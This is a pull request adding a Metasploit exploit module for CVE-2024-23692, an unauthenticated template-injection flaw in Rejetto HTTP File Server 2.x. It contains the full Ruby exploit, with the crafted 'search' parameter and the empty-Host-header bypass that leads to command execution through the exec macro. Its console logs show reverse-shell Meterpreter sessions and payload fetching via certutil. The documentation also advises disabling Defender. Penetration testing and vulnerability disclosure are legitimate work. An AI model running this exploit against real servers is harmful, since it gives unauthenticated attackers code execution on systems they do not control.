### PR TITLE
Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)

### DIFF
--- a/documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md
+++ b/documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md
@@ -1,0 +1,112 @@
+## Vulnerable Application
+The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to a unauthenticated server side template
+injection (SSTI) vulnerability. An remote unauthenticated attacker can execute code with the privileges
+of the user account running the HFS.exe server process. This exploit has been tested to work against version
+2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers
+and no patch is available. Users are recommended to upgrade to version 3.x.
+
+## Testing
+[Download](https://github.com/rejetto/hfs2/releases/download/v2.4-rc06/hfs.exe) and a vulnerable version of HTTP
+File Server (HFS). To run this server, simply execute the HFS.exe binary. By default the server will listen for
+HTTP connections on port 80.
+
+The exploit has been tested against versions:
+* 2.4.0 RC7
+* 2.3m
+
+## Verification Steps
+Note: On Windows, disable Defender if you are using the default payloads.
+
+1. Start msfconsole
+2. `use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set payload cmd/windows/http/x64/meterpreter_reverse_http`
+5. `set LHOST eth0`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Automatic
+
+```
+msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
+RHOSTS => 192.168.86.35
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set payload cmd/windows/http/x64/meterpreter_reverse_http
+payload => cmd/windows/http/x64/meterpreter_reverse_http
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
+LHOST => eth0
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > show options
+
+Module options (exploit/windows/http/rejetto_hfs_rce_cve_2024_23692):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.86.35    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                   yes       The base path to the web application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_http):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      gnwWBKQz         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The local listener hostname
+   LPORT               4444             yes       The local listener port
+   LURI                                 no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
+[+] 192.168.86.35:80 - The target is vulnerable. Rejetto HFS version 2.4.0 RC7
+msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit 
+
+[*] Started HTTP reverse handler on http://192.168.86.42:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Redirecting stageless connection from /pBzS1uPGeqRa91v1PJaNDwwtxXK-KTpGms8g with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Attaching orphaned/stageless session...
+[!] http://192.168.86.42:4444 handling request from 192.168.86.35; (UUID: ykybl99e) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:31348) at 2024-06-06 16:38:33 +0100
+
+meterpreter > getuid
+Server username: testing-vm\user
+meterpreter > sysinfo
+Computer        : TESTING-VM
+OS              : Windows 11 (10.0 Build 22631).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md
+++ b/documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md
@@ -6,7 +6,7 @@ of the user account running the HFS.exe server process. This exploit has been te
 and no patch is available. Users are recommended to upgrade to version 3.x.
 
 ## Testing
-[Download](https://github.com/rejetto/hfs2/releases/download/v2.4-rc06/hfs.exe) and a vulnerable version of HTTP
+[Download](https://github.com/rejetto/hfs2/releases/download/v2.4-rc06/hfs.exe) a vulnerable version of HTTP
 File Server (HFS). To run this server, simply execute the HFS.exe binary. By default the server will listen for
 HTTP connections on port 80.
 

--- a/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb
+++ b/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
           injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges
           of the user account running the HFS.exe server process. This exploit has been tested to work against version
           2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers
-          and no patch is available. Users are recommended to upgrade to version 3.x.
+          and no patch is available. Users are recommended to upgrade to newer supported versions.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb
+++ b/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb
@@ -1,0 +1,144 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template
+          injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges
+          of the user account running the HFS.exe server process. This exploit has been tested to work against version
+          2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers
+          and no patch is available. Users are recommended to upgrade to version 3.x.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # Metasploit exploit
+          'Arseniy Sharoglazov' # Original finder
+        ],
+        'References' => [
+          ['CVE', '2024-23692'],
+          ['URL', 'https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/'],
+        ],
+        'DisclosureDate' => '2024-05-25',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            # Tested against Rejetto HFS version:
+            # * 2.4.0 RC7
+            # * 2.3m
+            'Automatic', {}
+          ],
+        ],
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DefaultOptions' => {
+          'RPORT' => 80
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            # If the HFS.exe process is run in a desktop session, the payload cmd.exe window will momentarily popup.
+            SCREEN_EFFECTS
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the web application', '']),
+      ]
+    )
+  end
+
+  def send_ssti_request_cgi(template, opts = {})
+    opts['vars_get'] ||= {}
+    opts['headers'] ||= {}
+
+    # The 'search' query parameter is echoed into the content before server side template processing occurs on the
+    # content being processed. Under normal operation any user supplied content will be escaped, so any symbols, which
+    # are encoded as '%symbol%' and macro which are encoded as '{:macro:}' will be escaped to prevent SSTI.
+
+    # However we can force a percent symbol to become un-escaped. This allows us to embed any symbol in the content
+    # being processed. We can leverage this to force the '%url%' symbol to become unescaped. This will echo back the
+    # remainder of the un-encoded URL into the server side content.
+
+    # To inject our own content, we need to first write a MARKER_UNQUOTE ':}' sequence,
+    # however this will be filtered. We can then bypass the filtering for ':}' by leveraging the %host% symbol and an
+    # empty host header value. So ':%host%}' will become ':}' and this will not be escaped. After this happens we can
+    # perform an arbitrary template injection of any HFS symbols or macros we want.
+
+    opts['vars_get'].merge!({
+      'search' => "%25#{Rex::Text.rand_text_alpha(1)}%25url%25:%host%}#{template}"
+    })
+
+    # The Host header must be an empty string for the above symbol substitution to bypass the MARKER_UNQUOTE filtering.
+    opts['headers'].merge!({
+      'Host' => ''
+    })
+
+    opts['method'] = ['GET', 'POST'].sample
+
+    opts['uri'] = normalize_uri(target_uri.path)
+
+    opts['encode_params'] = false
+
+    send_request_cgi(opts)
+  end
+
+  def check
+    cookie_name = Rex::Text.rand_text_alphanumeric(32)
+    cookie_value = Rex::Text.rand_text_alphanumeric(32)
+
+    # Our check routine will leverage the SSTI vulnerability and use it to read a cookie value by its name, writing
+    # this value to the response output. In addition we will write the current server version into the response output.
+    # We can therefore verify if a target is vulnerable by first confirming the expected cookie value is now present
+    # in the response output, and if so we can also pull out the target servers version number.
+    res = send_ssti_request_cgi(
+      "{.cookie|#{cookie_name}.}=%version%=",
+      {
+        'headers' => {
+          'Cookie' => "#{cookie_name}=#{cookie_value}"
+        }
+      }
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
+
+    version = res.body.match(/#{cookie_value}=([^=]+)=/)
+
+    return CheckCode::Vulnerable("Rejetto HFS version #{version[1]}") if version
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    command_string = "\"cmd\" \"/c #{payload.encoded}\""
+
+    command_chars = command_string.unpack('C*').join('|')
+
+    # To get code execution we leverage the 'exec' macro. We must leverage the 'chr' macro to construct an arbitrary
+    # command string in order to avoid the server filtering out certain characters such as '%'. To avoid executing the
+    # payload 4 times, we leverage the 'break' macro to stop processing the output.
+    send_ssti_request_cgi("{.exec|{.chr|#{command_chars}.}.}{.break.}")
+  end
+end


### PR DESCRIPTION
This pull request adds an exploit module for CVE-2024-23692, a unauth SSTI in the Rejetto HTTP File Server (HFS).

Original finder has a blog post here, along with a redacted PoC: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

I wrote a short AKB assessment here: https://attackerkb.com/assessments/f5c5359d-2446-4e33-a1a2-6a66aa2fb5f6

Tested against versions:
* 2.4.0 RC7
* 2.3m

### Example usage:
```
msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
RHOSTS => 192.168.86.35
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
RPORT => 80
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.86.35:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[*] Sending stage (201798 bytes) to 192.168.86.35
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:32057) at 2024-06-06 18:03:13 +0100

meterpreter > getuid
Server username: testing-vm\user
meterpreter >
```